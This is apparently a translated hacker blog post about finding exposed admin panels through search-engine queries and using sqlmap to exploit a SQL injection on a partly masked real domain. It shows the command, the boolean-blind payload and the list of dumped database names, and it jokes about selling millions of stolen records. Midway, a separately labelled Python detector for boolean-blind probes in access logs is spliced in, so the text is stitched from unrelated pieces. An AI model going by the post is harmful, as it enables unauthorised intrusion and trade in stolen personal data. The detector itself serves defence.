First, pick the site you want to scan. The simplest and crudest way is to search straight from the browser. What? You don't know how? Go Google it yourself.
For example, I want to scan for admin backends; those who get it, type 1, and those who don't, type 1 too. Then you'll see lots and lots of sites' admin backends. Pick any one, go in, and poke around at your leisure.
With just this method, I got hold of a SQL injection point:
python sqlmap.py -u http://dianping.******com.cn/valuation/index.php/index/search?k=think --dbs
Python is great; sqlmap is even greater. If you don't know how to use it, go Google it yourself.
Inject at the injection point and get the databases:
Place: GET
Parameter: k
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: k=think') AND 2578=2578 AND ('QNdm'='QNdm
---
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: k
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: k=think') AND 2578=2578 AND ('QNdm'='QNdm
---
back-end DBMS: MySQL 5
available databases [23]:
[*] antispam
[*] information_schema
[*] lenovo_osd
[*] lenovo_report
[*] lenovovaluation
[*] lenovovaluation_test
[*] lenovoweixin
[*] lwttest
[*] mysql
[*] performance_schema
[*] report
[*] rrwechat
[*] test
[*] testa
[*] valuation_uat
[*] vmall
[*] vmall_test
[*] weixin
[*] weixin_ceshi
[*] weixin_test
[*] weixin_uat
[*] wxshopuat
[*] yunyingweixin
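Seen from the other side of the wire, a boolean-based blind probe like the one sqlmap reported above leaves a recognisable trace in the web server's access log: the same parameter hit repeatedly with a string-breaking quote, an AND/OR, and a numeric comparison that is true in one request and false in the next, with the response size differing between the pair. The following detector is an added example and not part of the original post; the log lines are constructed for the demo and use the path from the post only as sample data.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines for this demo (not taken from any real server).
# Lines 2 and 3 carry the true/false pair of a boolean-blind probe on parameter k,
# line 4 is a benign search that merely contains the word AND.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:12:00:01 +0000] "GET /valuation/index.php/index/search?k=think HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2023:12:00:02 +0000] "GET /valuation/index.php/index/search?k=think%27%29%20AND%202578%3D2578%20AND%20%28%27QNdm%27%3D%27QNdm HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2023:12:00:03 +0000] "GET /valuation/index.php/index/search?k=think%27%29%20AND%202578%3D2579%20AND%20%28%27QNdm%27%3D%27QNdm HTTP/1.1" 200 3310
203.0.113.9 - - [10/Oct/2023:12:00:04 +0000] "GET /valuation/index.php/index/search?k=rock+AND+roll HTTP/1.1" 200 4090
"""

# Common/combined log format: client IP, timestamp, request line, status, response size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+)'
)
# A quote or closing paren that breaks out of the SQL string literal, then a boolean
# operator and a numeric comparison (n=n for the "true" probe, n=n+1 for the "false" one).
BOOL_PROBE_RE = re.compile(r"""['")]\s*(?:and|or)\s+\d+\s*=\s*\d+""", re.IGNORECASE)


def find_probes(log_text):
    """Return one dict per query-parameter value that looks like a boolean-blind probe."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected log format
        parts = urlsplit(m.group("target"))
        # parse_qs already percent-decodes values and turns '+' into spaces.
        for name, values in parse_qs(parts.query, keep_blank_values=True).items():
            for value in values:
                if BOOL_PROBE_RE.search(value):
                    hits.append({"ip": m.group("ip"), "path": parts.path, "param": name,
                                 "value": value, "size": int(m.group("size"))})
    return hits


def probe_counts(hits):
    """Count probes per (client IP, path, parameter). Two or more hits on one parameter
    whose response sizes differ are the signature of a boolean-blind scan, not a typo."""
    return Counter((h["ip"], h["path"], h["param"]) for h in hits)
```

Fold `find_probes` over a real log and alert on any (ip, path, param) key whose count reaches two; pairing it with a sharp change in response size between the two requests cuts false positives from ordinary searches.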
Pick any table at random and go in.
This info doesn't look like it's of any use, but it's only that this particular info is useless: on certain "underground nets" a single record might be worth a yuan or two, and with a few million records you'd marry a rich beauty and reach the peak of life in one go. (Or it might get you a pair of platinum bracelets instead, manual grin 0.0)